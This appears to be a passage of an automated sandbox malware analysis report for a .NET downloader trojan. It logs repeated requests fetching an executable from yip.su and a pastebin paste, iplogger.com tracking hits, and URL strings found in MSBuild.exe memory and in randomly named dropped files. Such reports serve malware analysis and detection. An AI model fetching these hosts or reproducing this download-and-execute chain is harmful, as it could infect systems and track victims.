          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
          Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: iplogger.com
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
          Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
          Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
          Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: pastebin.com
          Source: global trafficDNS traffic detected: DNS query: yip.su
          Source: global trafficDNS traffic detected: DNS query: iplogger.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:20:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:21:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:22:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:23:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
          Source: MSBuild.exe, 00000007.00000002.4625191129.0000000005EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
          Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/bCj6TXPeWec.crl0
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
          Source: svchost.exe, 00000009.00000002.3816448684.000002CA7A800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
          Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
          Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
          Source: MSBuild.exe, 00000007.00000002.4625191129.0000000005EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
          Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt0
          Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/mus0%
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: http://ocsp.sectigo.com0
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yip.su
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: https://aka.ms/nativeaot-c
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: https://aka.ms/nativeaot-compatibility
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityh
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://counter.yadro.ru/hit?
          Source: qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 00000009.00000003.2174242561.000002CA7A660000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1djqU4
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://iplogger.org/
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://iplogger.org/privacy/
